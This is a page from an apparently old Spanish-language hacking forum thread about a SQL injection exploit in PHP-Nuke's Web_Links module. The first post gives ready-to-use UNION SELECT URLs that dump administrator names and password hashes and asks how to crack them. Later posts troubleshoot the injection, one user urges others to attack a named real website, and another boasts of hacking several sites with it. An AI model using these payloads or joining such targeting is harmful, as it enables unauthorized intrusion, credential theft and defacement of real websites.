Páginas: 1 [2] 3 4 
|
 |
|
 Autor
|
Tema: exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones.... (Leído 13294 veces)
|
|
[Ky3zZ]
|
Realmente funciona Para el PHP-Nuke y el Modulo WebLinks: Para que muestre todos los administradores: /modules.php?name=Web_Links&l_op=viewlink&cid=2%20UNION%20select%20counter,%20aid,%20pwd%20FROM%20nuke_authors%20 Y para que muestre los Password Codificados de los administradores: /modules.php?name=Web_Links&l_op=viewlink&cid=2%20UNION%20select%20counter,%20pwd,%20aid%20FROM%20nuke_authors%20 Pero
tengo una duda como puedo crackear con el Cain el PWL? es que no lo
entiendo.. por mas que traduzco manuales del cain al español no se como
crackear el pasword si alguien sabe algo... que me mande un e-mail: juan_lux@hotmail.com |
|
|
|
|
En línea
|
El "terrorismo" es una "espiniya" en la "sociedad" que hay que "eliminarla" lo antes posible, para podamos "vivir" en "PAZ"
|
|
|
|
[Ky3zZ]
|
Weinas...oyes yo me preguntaba por casualidad... habria forma de saltarse la proteccion esa?
Es
que no me acorde de guardar el Pass en MD5 y ahora an puesto la
proteccion en la web donde lo hice y no se... amos que yo me preguntaba
eso que si habia alguna manera de poder saber de nuevo el pass
saltandose la proteccion..? ??? ??? ???
|
|
|
|
|
En línea
|
El "terrorismo" es una "espiniya" en la "sociedad" que hay que "eliminarla" lo antes posible, para podamos "vivir" en "PAZ"
|
|
|
|
CamelSmoke
|
En
realidad el Password MD5 no se saca de ninguna de esas maneras...bah,
tal vez con el spaniz nuke, pero PHP-Nuke no muestra los pass MD5, al
menos aun no encontre la forma de verlo ni encriptado ni nada, lo cual
me gustaria ya que quiero asegurar mi sitio en PHP-Nuke.
|
|
|
|
|
En línea
|
CamelSmoke® - bibliobar.com.ar
|
|
|
p47ch
Visitante
|
Disculpar mi ignorancia, pero como se que versión de nuke esta utilizando dicha pagina? Pues algunas no lo dicen ! Gracias !  Ademas me sale lo sig: Warning: Supplied argument is not a valid MySQL result resource in /var/www/html/includes/sql_layer.php on line 238 Warning: Supplied argument is not a valid MySQL result resource in /var/www/html/includes/sql_layer.php on line 286 y Warning: Supplied argument is not a valid MySQL result resource in /var/www/html/includes/sql_layer.php on line 286 Warning: Supplied argument is not a valid MySQL result resource in /var/www/html/includes/sql_layer.php on line 286 Cuando pongo http://www.el-dominio.com/modules.php?name=Web_Links&l_op=viewlink&cid=2%20UNION%20select%20counter,%20aid,%20pwd%20FROM%20nuke_authors%20Por q ? |
|
|
|
« Última modificación: 05 Marzo 2004, 00:15 por p47ch »
|
En línea
|
|
|
|
|
[Ky3zZ]
|
Eso
es muy facil, te salen los errores de la base de datos.. porque? pues
por que la web donde as realizado el bug no tiene activado el modulo de
Web_Links o simplemente a borrado ese modulo como preteccion.
Lo que sacamos encuenta.. que no se puede hacer en esa web.
|
|
|
|
|
En línea
|
El "terrorismo" es una "espiniya" en la "sociedad" que hay que "eliminarla" lo antes posible, para podamos "vivir" en "PAZ"
|
|
|
|
CELL
|
|
|
|
|
« Última modificación: 22 Marzo 2004, 22:12 por CELL »
|
En línea
|
|
|
|
|
[Ky3zZ]
|
 Se jodio se jodio... que ya no vale este exploit para el php-nuke de la nueva version... ya que viene con sus protecciones
|
|
|
|
|
En línea
|
El "terrorismo" es una "espiniya" en la "sociedad" que hay que "eliminarla" lo antes posible, para podamos "vivir" en "PAZ"
|
|
|
|
X
|
No ma, necesitamos nuevas cosas para nuke, sacan muy pronto los patches para los bugs y exploits.
A
ver si alguien le hecha también una chekada a esto, una pagina sin
patches toda sin tecnología hecha en el 2002 sin ninguna actualización
y no la puedo tomar ni meterme como admin, he tratado todos los
exploits y sqlinjection del mundo y no he podido, es fusión de phpbb y
php nuke pero lo que no entiendo es como diablos tiene seguridad si
esta en phpnuke 5.5 y phpbb2.0.4 es imposible uqe no la haya podido
tomar he tratado 4 meses, ninguna page se me ha resistido tanto, a ver
si alguién me ayuda con esto www.animexico.net es la page, hagan la prueba y veran que se frustraran jajaj si necesito ayuda aca un nuevo exploit a lo mejor sirve.
|
|
|
|
|
En línea
|
Unidos
todos los hackes para destruir animexico.com.mx o animexico.net o
anicast.com.mx ya que ellos nos dicen lammers a nosotros.
X - "THE RING MUST BE DESTROYED"
I
can see in your eyes, the same fear that could take the heart of me, a
day may come when courage of man fails, when we forsake our friends and
break all bonds of fellowship, but this is not this day, TODAY WE FIGHT!
|
|
|
|
oRTNZ
|
esta parchado, busca otro bug,suerte
|
|
|
|
|
En línea
|
el
31 de 2005, un dia que nunca olvidare y me llevare conmigo ese
sentimiento tan bonito llamado amor,hasta el dia en que se me acabe el
aliento.
|
|
|
|
[Ky3zZ]
|
Wenas... Ya
nadie actuliza esto?? porque yo tengo una dudita.. el día 10 uno
usuarios (por llamarlos asi) me se infiltraron en mi web de php-nuke
7.2 borrandome y cambiandome varias cosas del web ( y ellos me dejaron
un mensaje diciendo que la habian hackeado... y que yo era un
lammer)(la verdad no se quien es mas lammer si ellos o yo), ahora la he
tenido que borrar de nuevo y volverla a subir... esto ya no me va a
volver a pasar.. porque,ya que e puesto logers y algunas cosillas para
que me de total información de quien entra o sale de la pagina solo
digo que la proxima vez que ocurra ya no borrare la pagina si no que
denunciare a los usuarios maldiciosos llevando a la guardia civil todos
los corresponidientes documentos que piden para una denuncia requeridad
por la legislación española. Ahora esta es mi duda... que bug
puede tener el php-nuke7.2, si estan con los correspondientes
parches??? ha salido algun bug nuevo? Saludos. P.D.: Los usuarios maldiciosos que borraron y/o jodieron mi web me dejaron http://www.elhacker.net y "emulanetwork" de referencia, asique supongo que serán usuarios registrados aquí. |
|
|
|
|
En línea
|
El "terrorismo" es una "espiniya" en la "sociedad" que hay que "eliminarla" lo antes posible, para podamos "vivir" en "PAZ"
|
|
|
|
oRTNZ
|
|
|
|
|
|
En línea
|
el
31 de 2005, un dia que nunca olvidare y me llevare conmigo ese
sentimiento tan bonito llamado amor,hasta el dia en que se me acabe el
aliento.
|
|
|
|
|
|
satan_31337_hack
|
ME A FUNCIONADO DE MARAVILLA EL EXPLOIT YA E HACKIADO VARIAS WEBS!!!!!! GRACIAS A TODOOOOOS!!!!!!!!!!! 8)
|
|
|
|
|
En línea
|
|
|
|
|
CEROX
|
alguien tan hamable me puede decir como se si la pagina es vurnerable o es php nuke gracias!!!
|
|
|
|
|
En línea
|
XDDDDD
|
|
|
|
viruss1362
|
joder
CEROX eso es facil, php nuke se caracteriza por muchas cosas si eso
hazte una web en php nuke y veras lo k tiene en especial enga machote k tu puedes xDD |
|
|
|
|
En línea
|
Más vale parecer un idiota con la boca cerrada, que abrir la boca y demostrar que lo eres
|
|
|
|
Páginas: 1 [2] 3 4 
|
|
|
 |
\ y dense una vuelta por el foro las risas estan garantizadas por ejemplo en estos post 
